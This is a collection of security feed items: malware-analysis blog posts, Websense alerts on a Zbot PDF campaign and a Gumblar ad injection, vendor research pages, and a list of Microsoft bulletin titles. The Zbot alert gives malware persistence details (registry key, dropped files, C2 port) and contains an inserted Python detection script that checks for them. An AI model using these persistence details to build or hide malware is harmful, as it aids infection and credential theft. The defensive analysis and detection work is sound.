http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx It is common to hear reverse engineers throw around the phrase "forty-thousand hex". To someone unfamiliar with reverse engineering or debugging in Windows, this phrase would probably be interpreted to mean the value 0x00040000. However, when reverse engineers say "forty-thousand hex", they are actually referring to the value 0x00400000. The value 0x00400000 is commonly seen when doing low-level work in Windows because this is the default base address of EXE files compiled by Microsoft's C++ compiler. So why say "forty-thousand hex" instead of "four-hundred-thousand hex"? For starters, the former is easier to say (one less syllable) than the latter. But more importantly, hexadecimal numbers are usually grouped in sets of 2 digits (bytes) instead of in groups of 3 digits as in base 10. As such, a reverse engineer could read 0x00400000 as 0x00,40,00,00. Going from right to left, we have 00 in the tens place, 00 in the hundreds place, and 40 in the thousands place.

==> Circumventing custom SEH

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I do most of my malware analysis statically, which is to say that I typically analyze malware by looking at a static disassembly of it as opposed to stepping through it in a debugger. However, sometimes I come across complicated or confusing code that would be easier to understand by walking through it in a debugger. I came across such an example the other day. An important branch decision was being made based on the result of a function that used a stack variable that IDA Pro couldn't represent in a simple way. Here's a snippet from the function:

mov edx, [ebp+arg_0]
add edx, 108h
push edx

I could have traced back in the disassembly to figure out what arg_0 + 108h was really pointing to (it turned out to be a global variable and arg_0 was set by the caller of the caller of this function), but I thought that I could save time by loading the target into a debugger and setting a breakpoint on the code above in order to determine what was actually being pushed. There was a problem, though. This malware launched other instances of itself, and setting a breakpoint on the code above in a debugger didn't work since the parent process never executed that code, only the child instances did. I could have set a breakpoint on CreateProcessA(...), forced it to load the child processes in a suspended state, attached a debugger to the children, then resumed them, but this was more trouble than it was worth. Instead, I opted for another method of attack. I configured my debugger for Just-In-Time (JIT) debugging (see http://support.microsoft.com/default.aspx?scid=kb;en-us;103861) so that I could attach to a crashed process via the Microsoft Application Error Reporting dialog box (also known as "Dr. Watson" -- see http://blogs.msdn.com/oldnewthing/archive/2005/08/10/449866.aspx).
I then overwrote the code above with an int 3 and patched the file, with the expectation that after running the parent program this would crash the child process, cause the Microsoft Application Error Reporting dialog box to pop up, and allow me to attach to the crashed child process. (It should be noted that this was done on an isolated network in a very controlled environment, and with all of our safeguards in place it was practically impossible for the modified malware to get out of our secure lab.) I saved the patched file and ran it, waiting eagerly for the Microsoft Application Error Reporting dialog box to appear. To my surprise, nothing happened. As it turned out, the program was using custom Structured Exception Handling (SEH) routines and because of this the int 3 exception was never passed to the operating system, so the Microsoft Application Error Reporting dialog box never popped up. To remediate this, I changed my int 3 patch to the following:

mov eax, fs:[0]
mov [eax+4], 7c8399f3h
int 3

This effectively overwrote the first exception handler in the SEH chain (see http://www.microsoft.com/msj/0197/exception/exception.aspx) with the default exception handler from kernel32.dll. The address of this handler is of course version-specific; in my case kernel32.dll was US English version 5.1.2600.2180. With this patch in place, the Microsoft Application Error Reporting dialog box popped up for the child process and I was able to attach my debugger and determine the value of arg_0 + 108h from the original code above.

==> FortiExplorer 1.9.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiExplorer 1.9.0 B1436 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models:
* MS Windows 7, MS Windows Vista, MS Windows XP
* Mac OS X 10.6

==> How fair should Google Search be?

http://rgaucher.info/feed/rss2 This is the question that is rising in my mind right now... If you search for "Chrome" with the Google search engine, you will find their browser in the third position. Okay, it's not the first one, but I'm just wondering how possible it is for the brand-new-shiny-buggy browser to be that well referenced in a "classical" manner. Of course, this is under the google.com domain which (the main page) is PageRank 10, but well, I'm really wondering if this was a natural process or if something happened. First off, we can see that, using the search engine, the related pages of google.com/chrome are the different search engines... How come? Shouldn't it be more like Mozilla, Opera... Microsoft IE... ? For instance, if I look for the related pages of yahoo.com/finance I will find financial websites such as NASDAQ, etc. Anyway, if Google can control their search engine like that (and of course it's easy for them to do so...), what is the impact on the fairness of their search engine? The PR seems to be okay as long as there is no business-like interference in the process...

==> Microsoft attempts legal action to disrupt some Zeus botnets

http://rss.techtarget.com/981.xml Legal and technical actions could disrupt some Zeus botnet operations by seizing command-and-control servers in Pennsylvania and Illinois.

==> Microsoft Forefront Threat Management Gateway- Voted WindowSecurity.com Readers' Choice Award Winner - Firewall Software

http://rss.windowsecurity.com/ Microsoft Forefront Threat Management Gateway was selected the winner in the Firewall Software category of the WindowSecurity.com Readers' Choice Awards. Check Point VPN-1 UTM and McAfee Firewall Enterprise were runner-up and second runner-up respectively.

==> Accessing Active Directory Information with LDP

http://rss.windowsecurity.com/ In this article, the author will expose some security issues related to LDAP and Active Directory, using a free Microsoft tool called LDP.exe

==> Video: Security Compliance Manager 2.5: Understanding Baselines

http://rss.windowsecurity.com/ This video introduces Microsoft Security Compliance Manager 2.5 and explains the concept of baselines.

==> Malicious Web Site / Malicious Code: New Zbot campaign comes in a PDF

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs has received several reports of a Zbot trojan campaign spreading via email. We have seen over 2200 messages so far. Zbot (also known as Zeus) is an information stealing trojan (infostealer) collecting confidential data from each infected computer. The main vector for spreading Zbot is a spam campaign where recipients are tricked into opening infected attachments on their computer. This new variant uses a malicious PDF file which contains the threat as an embedded file. When recipients open the PDF, it asks to save a PDF file called Royal_Mail_Delivery_Notice.pdf. The user falsely assumes that the file is just a PDF, and therefore safe to store on the local computer. The file, however, is really a Windows executable. The malicious PDF launches the dropped file, taking control of the computer. At time of writing this file has a 20% anti-virus detection rate (SHA1 : f1ff07104b7c6a08e06bededd57789e776098b1f). The threat creates a subdirectory under %SYSTEM32% with the name "lowsec" and drops the "local.ds" and "user.ds" files. These are configuration files for the threat. It also copies itself into %SYSTEM32% as "sdra64.exe" and modifies the registry entry "%SOFTWARE%\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" to launch itself during system startup. When it runs, it injects malicious code into the Winlogon.exe instance in memory. This Zbot variant connects to a malicious remote server in China using an IP address of 59.44.[removed].[removed]:6010.

[Screenshot: the email message]
[Screenshot: the PDF prompting to save the malicious embedded file]
[Screenshot: Adobe Acrobat Reader's warning about launching the file]

The problem lies deep inside the PDF file format. This technique is similar to, but not the same as, the one explained in this blog post.

Update: In addition to the Royal Mail emails we have also seen emails that look like they are coming from Canada Post. These are primarily being sent to email addresses in the .ca domain space.

[Screenshot: the Canada Post email]

Websense Messaging and Websense Web Security customers are protected against this attack.
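One way to turn the persistence details in the alert above into a host check, as an added example that is not Websense's code: it parses the Winlogon Userinit registry value the alert says this variant modifies, flags any command other than Windows' own userinit.exe, and looks for the dropped file names under %SYSTEM32%. The registry value strings and the directory listing are constructed samples; on a real host they would come from the registry and the file system.

```python
"""Check for the Winlogon Userinit persistence and dropped files described
in the Zbot alert. Added example, not Websense's code."""
import ntpath  # Windows path semantics, so this also runs on non-Windows hosts
from typing import Dict, List, Set

# Windows expects this value to hold only userinit.exe; Winlogon runs every
# comma-separated entry at logon, so anything appended here also runs.
EXPECTED_USERINIT = "userinit.exe"

# Relative paths under %SYSTEM32% that the alert names for this variant.
ZBOT_ARTIFACTS = {"sdra64.exe", "lowsec\\local.ds", "lowsec\\user.ds"}

# Constructed samples: Windows' default value and the same value with the
# dropped binary appended (the shape the alert describes, not a real capture).
CLEAN_USERINIT = "C:\\WINDOWS\\system32\\userinit.exe,"
INFECTED_USERINIT = "C:\\WINDOWS\\system32\\userinit.exe,C:\\WINDOWS\\system32\\sdra64.exe,"
INFECTED_LISTING = ["drivers\\etc\\hosts", "lowsec\\local.ds",
                    "lowsec\\user.ds", "sdra64.exe", "winlogon.exe"]


def split_userinit(value: str) -> List[str]:
    """Split the REG_SZ value into its command entries; the trailing comma
    present in the default value yields an empty entry that is dropped."""
    return [e.strip() for e in value.split(",") if e.strip()]


def executable_of(entry: str) -> str:
    """Return the executable path of one entry, ignoring any arguments.
    A quoted path is taken whole; an unquoted one ends at the first space,
    which is conservative (an unquoted path with spaces gets flagged)."""
    if entry.startswith('"'):
        end = entry.find('"', 1)
        return entry[1:end] if end > 0 else entry[1:]
    return entry.split(" ", 1)[0]


def suspicious_userinit_entries(value: str) -> List[str]:
    """Return every Userinit entry whose executable is not userinit.exe."""
    return [entry for entry in split_userinit(value)
            if ntpath.basename(executable_of(entry)).lower() != EXPECTED_USERINIT]


def zbot_artifacts_present(system32_listing: List[str]) -> Set[str]:
    """Given relative paths under %SYSTEM32%, return those matching the
    files the alert says this variant drops (case-insensitive)."""
    normalized = {p.replace("/", "\\").lower() for p in system32_listing}
    return {a for a in ZBOT_ARTIFACTS if a.lower() in normalized}


def check_host(userinit_value: str, system32_listing: List[str]) -> Dict[str, List[str]]:
    """Combine both checks into one report; empty lists mean nothing found."""
    return {
        "userinit_extra": suspicious_userinit_entries(userinit_value),
        "dropped_files": sorted(zbot_artifacts_present(system32_listing)),
    }


if __name__ == "__main__":
    print("clean host:   ", check_host(CLEAN_USERINIT, ["drivers\\etc\\hosts"]))
    print("infected host:", check_host(INFECTED_USERINIT, INFECTED_LISTING))
```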

==> Malicious Web Site / Malicious Code: Microsoft's Ninemsn Australia Web Site Compromised

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs ThreatSeeker Network has detected that the ninemsn support Web site (ninemsn.com.au) has been compromised and injected with malicious code. The malicious code was identified to be part of the Gumblar mass injections, and the injected code is hidden deep within the ninemsn ad engine, served on request. The injected code leads to a site that has also been compromised by Gumblar. The compromised code is hidden specifically within the "Women's Weekly" banner script. Other ad banners are not affected.

[Screenshot: the Web site]
[Screenshot: the ad element]

At this time, the malicious code isn't available or reachable, but this could change at any time. An interesting implication is that this ad can be dynamically served on multiple Web pages within ninemsn. This is unlike a typical injection where Web sites are compromised in a single static page; in this case, the infected banner ad can be pulled to various locations within the site, serving its malicious purpose silently. Ninemsn, a joint venture between PBL Media and Microsoft, is one of the most visited portal Web sites (Alexa traffic rank 573) delivering online and mobile content, news, information, entertainment, and social networking capabilities. We contacted Microsoft when we discovered the attack and the ad banner has now been removed from the ninemsn support Web site. Websense Messaging and Websense Web Security customers are protected against this attack.

==> Secure Application Development

http://securosis.com/feeds/research Secure application development is about building secure software. Most security products offer band-aid protection for existing applications: they filter, block, or proxy communications to/from applications that are incapable of protecting themselves. We want to get away from this “Features first, security second” model and code applications that are self-reliant and can protect themselves. The secure code movement is in its infancy. There are different processes, training programs, and tools to aid the development of secure applications – which we will cover here. We will also reference some of the OWASP and Rugged Software projects.

Papers and Posts
------------
* FireStarter: Agile Development and Security
* Comments on Microsoft Simplified SDL
* Rock Beats Scissors, and People Beat Process
* FireStarter: Secure Development Lifecycle – You’re Doing It Wrong
* Structured Security Program, Meet Agile Process
* FireStarter: For Secure Code, Process Is a Placebo – It’s All about Peer Pressure
* Are Secure Web Apps Possible?
* Clickjacking Details, Analysis, and Advice

Presentations
---------
* Security + Agile = FAIL

Podcasts, Webcasts, and Multimedia
---------
We do not currently have multimedia for this topic.

Vendors
---
We’ll include white and black box analysis, fuzzing, and tools vendors. This list is currently evolving, and we’ll include other firms as time permits.
* Cigital
* HP (SpiDynamics, Fortify)
* IBM (Ounce)
* Veracode
* WhiteHat Security

==> Encryption

http://securosis.com/feeds/research

Papers and Posts
------------
If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments.)
1. The most important piece of work we’ve published on encryption is Understanding and Selecting a Database Encryption or Tokenization Solution.
2. Your Simple Guide to Endpoint Encryption.
3. Post on the Three Laws of Data Encryption.
4. Format and Datatype Preserving Encryption.
5. Post on When to Layer Encryption.
6. Application vs. Database Encryption.
7. The post Database Media Protection focuses on threats to storage media, and some follow-up comments on Database Media Threats.
8. The Data Security Lifecycle covers encryption during the movement and storage of data.

General Coverage
------------
1. Tokenization Will Become the Dominant Payment Transaction Architecture
2. Visa’s Data Field Encryption
3. Boaz Nails It- The Encryption Dilemma
4. “PIN Crackers” and Data Security, looking at attacks on encryption.
5. Part of the core value of Data Centric Security is the ability to protect data regardless of where it moves or resides, which is facilitated by encryption. This is discussed in Part 1 and Part 2 of the Best Practices for Endpoint Security.
6. An editorial on how parts of the U.S. intelligence community discourage the adoption of encryption, as it is counterproductive to their mission.
7. This post discusses Digital Rights Management (DRM) as it pertains to Cloud Computing and content protection.

Presentations
---------
* Presentation on Data Breaches and Encryption.
* Presentation on Data Protection in the Enterprise. This is a corporate overview.
* This presentation is on Encrypting Mobile Data for the Enterprise.

Podcasts, Webcasts and Multimedia
---------
We do not currently have any multimedia for this topic.

Vendors/Tools
---------
The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). Being here does not imply any endorsement; this list is simply meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections.

Enterprise/General Encryption Providers
* Certicom
* CheckPoint
* Entrust
* GuardianEdge
* IBM
* nuBridges
* Prime Factors Inc.
* RSA
* SafeNet
* Sophos (Utimaco)
* Symantec (PGP)
* Thales (nCipher)
* TrueCrypt
* Venafi
* Voltage
* Vormetric
* WinMagic

Endpoint Encryption Vendors
* beCrypt
* Credant
* DESLock
* McAfee (SafeBoot)
* Microsoft (BitLocker)
* Namo
* Secude
* Secuware

Database Encryption Vendors
* IBM
* NetLib
* Oracle
* Relational Wizards
* RSA (Valyd)
* SafeNet (Ingrian)
* Sybase
* Thales (nCipher)
* Voltage
* Vormetric

Key Management, Certificate and other tools
* Entrust
* Prime Factors Inc.
* RSA
* Symantec (Verisign)
* Thales

==> Cloud Computing Security

http://securosis.com/feeds/research This section of the research library is dedicated to all things Cloud. Mostly we will cover Cloud Security, but along with this we need to have some understanding of what ‘The Cloud’ actually is, and what the major variations look like. We will also cover SaaS and Virtualization under this space; not because they are ‘The Cloud’, but because they involve a Cloud-like model in many cases. We will be adding a lot of content to this section in the coming weeks.

Papers and Posts
------------
* Rich’s series defining a Cloud Security Data Lifecycle: Introduction, Create, Store, Use, Share, Archive and Delete.
* Securing the Cloud with Virtual Private Storage.
* How The Cloud Destroys Everything I Love about Web Application Security.

Presentations
---------
* Understanding Cloud Security in 30 Minutes or Less!

Podcasts, Webcasts and Multimedia
---------
Chris Hoff co-hosts the Network Security Podcast, and talks about the Microsoft/EM partnership, Liquid Machines and Information Centric Security. Oh, he mentions a few things on ‘The Cloud’ too.

==> AMD video drivers prevent the use of the most secure setting for Microsoft's Exploit Mitigation Experience Toolkit (EMET)

http://www.cert.org/blogs/vuls/rss.xml Microsoft EMET is an effective way of preventing many vulnerabilities from being exploited; however, systems that use AMD or ATI video drivers do not support the feature that provides the highest amount of protection.

==> CERT Failure Observation Engine 1.0 Released

http://www.cert.org/blogs/vuls/rss.xml Hello, this is David Warren from the CERT Vulnerability Analysis team. In May 2010, CERT released the Basic Fuzzing Framework, a Linux-based file fuzzer. We released BFF with the intent to increase awareness and adoption of automated, negative software testing. An often-requested feature is that BFF support the Microsoft Windows platform. To this end, we have worked to create a Windows analog to the BFF: the Failure Observation Engine (FOE). Through our internal testing, we've been able to help identify, coordinate, and fix exploitable vulnerabilities in Adobe, Microsoft, Google, Oracle, Autonomy, and Apple software, as well as many others. Our office shootout post is a good example of this testing.

==> Effectiveness of Microsoft Office File Validation

http://www.cert.org/blogs/vuls/rss.xml Microsoft recently released a component for Office called Office File Validation that is supposed to help protect against attacks using malformed files. Because I recently performed file fuzzing tests on Microsoft Office, I decided to test the effectiveness of Office File Validation.

==> A Security Comparison: Microsoft Office vs. Oracle Openoffice

http://www.cert.org/blogs/vuls/rss.xml Recently, Dan Kaminsky published a blog entry that compared the fuzzing resiliency of Microsoft Office and Oracle OpenOffice. This blog entry contains the results from a similar test that I performed in November 2010. Also included are some other aspects of the Office suites that can affect the software's security.

==> Default ‘Do Not Track’ Is Best Choice for Internet Explorer 10 Users

http://www.eweek.com/rss-feeds-45.xml Advertisers that are fighting Microsoft's decision to set the Internet Explorer 10 browser setting by default to Do Not Track should understand that there's a way to get their message out without intruding on users' privacy.

==> Microsoft Says 6,000 Jobs Open, Wants More Visas

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Microsoft says it can't find enough skilled IT workers to fill open positions, but critics say the company is merely trying to justify hiring foreigners.

==> Advertisers' 'Do Not Track' Protests Fail Smell Test

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN An almost comic war of words continues between advertisers and Microsoft regarding do not track technology in Internet Explorer 10. Funny thing: The only tracking option advertisers want is opt-out.

==> Search for free software quickly becoming top online security threat

http://www.infosecurity-magazine.com/rss/news/ The latest Security Intelligence Report from Microsoft highlights a threat that has skyrocketed to the top of its list of greatest concerns in a relatively short period of time. In end-users' relentless search for free software activation keys, many are ending up with more than just what they perceive as a bargain.

==> Two-thirds of Bing users exposed to malicious links

http://www.infosecurity-magazine.com/rss/news/ Looking for celebrity gossip on Bing? Think twice: nearly two-thirds of search results on Microsoft's search engine contain malicious links. That's compared to the still-alarming 30% for Google.

==> RSA Europe 2012: Microsoft offers free cloud security assessment

http://www.infosecurity-magazine.com/rss/news/ In response to a recent independent study on cloud computing commissioned by Microsoft, the company took the wraps off a free online tool that helps organizations determine their security readiness to adopt cloud services

==> 25 critical updates in Adobe Flash fix

http://www.infosecurity-magazine.com/rss/news/ Just slightly out of kilter with today's Microsoft Patch Tuesday, Adobe yesterday issued a patch for 25 Flash vulnerabilities (14 buffer overflows and 11 memory corruption flaws), and another patch for Adobe AIR.

==> Microsoft will reject ‘weak’ digital certificates from tomorrow

http://www.infosecurity-magazine.com/rss/news/ A weak digital certificate is defined as one signed with an RSA key of less than 1024 bits. Since it is now generally accepted that keys of a lesser length can be brute-forced with modern computing power, Microsoft is upping the ante by forcing a move to a stronger key length.

==> Microsoft buys authentication firm PhoneFactor

http://www.infosecurity-magazine.com/rss/news/ Microsoft has bought the multi-factor authentication (MFA) company PhoneFactor. Financial terms of the deal have not been released. PhoneFactor will largely continue as is until its products are onboarded into the Microsoft Volume Licensing programs.

==> October Patch Tuesday preview

http://www.infosecurity-magazine.com/rss/news/ After a very light September, October's Patch Tuesday will revert to normal with seven security bulletins from Microsoft: one labeled critical and six labeled important.

==> Microsoft settles 3322.org Nitol botnet case

http://www.infosecurity-magazine.com/rss/news/ Microsoft's takedown of the 3322.org Chinese website, in an effort to limit the promulgation of the Nitol botnet, has yielded a settlement. Website owner Peng Yong has agreed to cooperate with Microsoft and the Chinese Computer Emergency Response Team (CN-CERT) to block all malicious connections to the domain, working to actively prevent malware infections.

==> Microsoft faces $7 billion fine by EU

http://www.infosecurity-magazine.com/rss/news/ Microsoft will be fined for failing to comply with a 2009 ruling from the EU, which had objected to the way the company was using its dominant operating system position to the advantage of its own browser.

==> Microsoft Patches Windows, Office Flaws

http://www.krebsonsecurity.com/feed/ Microsoft today pushed out seven updates to fix a variety of security issues in Windows, Microsoft Office and other software. If you’re using Windows, take a moment to check with Windows Update or Automatic Update to see if new security patches are available. Most of the vulnerabilities addressed in this month’s patch batch apply to [...]

==> In a Zero-Day World, It’s Active Attacks that Matter

http://www.krebsonsecurity.com/feed/ The recent zero-day vulnerability in Internet Explorer caused many (present company included) to urge Internet users to consider surfing the Web with a different browser until Microsoft issued a patch. Microsoft did so last month, but not before experts who ought to have known better began downplaying such advice, pointing out that other browser makers have more vulnerabilities and just as much exposure to zero-day flaws. This post examines hard data that shows why such reasoning is more emotional than factual. Unlike Google Chrome and Mozilla Firefox users, IE users were exposed to active attacks against unpatched, critical vulnerabilities for months at a time over the past year and a half.

==> Microsoft Fixes Zero-Day, Four Other Flaws in IE

http://www.krebsonsecurity.com/feed/ Microsoft has released an emergency update for Internet Explorer that fixes at least five vulnerabilities in the default Web browser on Windows, including a zero-day flaw that miscreants have been using to break into vulnerable systems. The patch, MS12-063, is available through Windows Update or via Automatic Update. If you installed the stopgap "fix it" tool that Microsoft released earlier this week to blunt the threat from the zero-day bug, you need not reverse or remove that fix it before applying this update. The vulnerability resides in IE 7, 8, and 9, on nearly all supported versions of Windows, apart from certain installations of Windows Server 2008 and Windows Server 2012.

==> IT Compliance Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This Solution Accelerator can help you shift your governance, risk, and compliance (GRC) efforts from people to technology. Use its configuration guidance to help efficiently address your organization's GRC objectives. See the online job aids for compliance.

==> Microsoft Operations Framework (MOF) 4.0

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml MOF 4.0 delivers practical guidance for everyday IT practices and activities, helping users establish and implement reliable, cost-effective IT services for governance, risk, and compliance (GRC) activities.

==> Security Compliance Management Toolkit

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This toolkit provides proven methods that your organization can use to effectively monitor the compliance state of recommended security baselines for Windows Vista, Windows XP Service Pack 2 (SP2), and Windows Server 2003 SP2.

==> Security Risk Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Security Risk Management Guide helps customers plan, build, and maintain a successful security risk management program.

==> SQL Server 2008 Compliance Guidance

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The SQL Server 2008 Compliance Guidance white paper is a complement to the SQL Server 2008 compliance software development kit (SDK).

==> Microsoft Security Assessment Tool

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Microsoft Security Assessment Tool (MSAT) consists of more than 200 questions designed to help identify and address security risks in IT environments. It includes best practices, standards such as ISO 17799, 27001 and NIST-800.x, as well as recommendations from the Microsoft Trustworthy Computing Group.

==> MS12-066 - Important : Vulnerability in HTML Sanitization Component Could Allow Elevation of Privilege (2741517) - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for October 2012 - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-058 - Critical : Vulnerabilities in Microsoft Exchange Server WebReady Document Viewing Could Allow Remote Code Execution (2740358) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-055 - Important : Vulnerability in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2731847) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-054 - Critical : Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution (2733594) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-053 - Critical : Vulnerability in Remote Desktop Could Allow Remote Code Execution (2723135) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2749655): Compatibility Issues Affecting Signed Microsoft Binaries - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-070 - Important : Vulnerability in SQL Server Could Allow Elevation of Privilege (2754849) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-069 - Important : Vulnerability in Kerberos Could Allow Denial of Service (2743555) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-068 - Important : Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2724197) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-067 - Important : Vulnerabilities in FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution (2742321) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-065 - Important : Vulnerability in Microsoft Works Could Allow Remote Code Execution (2754670) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-064 - Critical : Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (2742319) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2661254): Update For Minimum Certificate Key Length - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for August 2012 - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2737111): Vulnerabilities in Microsoft Exchange and FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution - Version: 3.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-043 - Critical : Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (2722479) - Version: 3.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for July 2012 - Version: 3.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2755801): Update for Vulnerabilities in Adobe Flash Player in Internet Explorer 10 - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-035 - Critical : Vulnerabilities in .NET Framework Could Allow Remote Code Execution (2693777) - Version: 2.3

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-061 - Important : Vulnerability in Visual Studio Team Foundation Server Could Allow Elevation of Privilege (2719584) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-063 - Critical : Cumulative Security Update for Internet Explorer (2744842) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2757760): Vulnerability in Internet Explorer Could Allow Remote Code Execution - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for September 2012 - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-062 - Important : Vulnerability in System Center Configuration Manager Could Allow Elevation of Privilege (2741528) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2736233): Update Rollup for ActiveX Kill Bits - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-045 - Critical : Vulnerability in Microsoft Data Access Components Could Allow Remote Code Execution (2698365) - Version: 1.3

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2728973): Unauthorized Digital Certificates Could Allow Spoofing - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-060 - Critical : Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2720573) - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2743314): Unencapsulated MS-CHAP v2 Authentication Could Allow Information Disclosure - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-052 - Critical : Cumulative Security Update for Internet Explorer (2722913) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-059 - Important : Vulnerability in Microsoft Visio Could Allow Remote Code Execution (2733918) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-057 - Important : Vulnerability in Microsoft Office Could Allow Remote Code Execution (2731879) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-056 - Important : Vulnerability in JScript and VBScript Engines Could Allow Remote Code Execution (2706045) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS11-009 - Important : Vulnerability in JScript and VBScript Scripting Engines Could Allow Information Disclosure (2475792) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-034 - Critical : Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight (2681578) - Version: 1.4

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-024 - Critical : Vulnerability in Windows Could Allow Remote Code Execution (2653956) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-020 - Critical : Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-013 - Critical : Vulnerability in C Run-Time Library Could Allow Remote Code Execution (2654428) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-004 - Critical : Vulnerabilities in Windows Media Could Allow Remote Code Execution (2636391) - Version: 1.3

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS11-092 - Critical : Vulnerability in Windows Media Could Allow Remote Code Execution (2648048) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-044 - Critical : Cumulative Security Update for Internet Explorer (2719177) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2719662): Vulnerabilities in Gadgets Could Allow Remote Code Execution - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-051 - Important : Vulnerability in Microsoft Office for Mac Could Allow Elevation of Privilege (2721015) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-050 - Important : Vulnerabilities in SharePoint Could Allow Elevation of Privilege (2695502) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-049 - Important : Vulnerability in TLS Could Allow Information Disclosure (2655992) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

